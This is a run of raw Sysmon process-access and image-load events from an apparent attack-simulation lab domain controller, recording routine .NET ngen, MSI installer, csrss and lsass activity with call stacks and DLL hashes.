14:57:24.218{A7A01FEF-EBD4-607E-9B0C-00000000BB01}19484560C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-9A0C-00000000BB01}3752c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.202{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-9B0C-00000000BB01}1948C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.202{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-9A0C-00000000BB01}3752c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.202{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-9A0C-00000000BB01}3752c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.186{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-980C-00000000BB01}6140c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.186{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-980C-00000000BB01}6140c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.186{A7A01FEF-EBD4-607E-980C-00000000BB01}6140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.171{A7A01FEF-EBD4-607E-990C-00000000BB01}54884172C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-980C-00000000BB01}6140c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.171{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-990C-00000000BB01}5488C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.155{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-980C-00000000BB01}6140c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.155{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-980C-00000000BB01}6140c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.155{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-960C-00000000BB01}2880c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.155{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-960C-00000000BB01}2880c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.155{A7A01FEF-EBD4-607E-960C-00000000BB01}2880C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.124{A7A01FEF-EBD4-607E-970C-00000000BB01}58046292C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-960C-00000000BB01}2880c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.124{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-970C-00000000BB01}5804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.108{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-960C-00000000BB01}2880c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.108{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-960C-00000000BB01}2880c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.108{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-940C-00000000BB01}5128c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.108{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-940C-00000000BB01}5128c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.108{A7A01FEF-EBD4-607E-940C-00000000BB01}5128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.093{A7A01FEF-EBD4-607E-950C-00000000BB01}40562308C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-940C-00000000BB01}5128c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.077{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-950C-00000000BB01}4056C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.077{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-940C-00000000BB01}5128c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.077{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-940C-00000000BB01}5128c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.061{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-920C-00000000BB01}3628c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.061{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-920C-00000000BB01}3628c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.061{A7A01FEF-EBD4-607E-920C-00000000BB01}3628C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.046{A7A01FEF-EBD4-607E-930C-00000000BB01}2784108C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-920C-00000000BB01}3628c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.030{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-930C-00000000BB01}2784C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.030{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-920C-00000000BB01}3628c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.030{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-920C-00000000BB01}3628c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 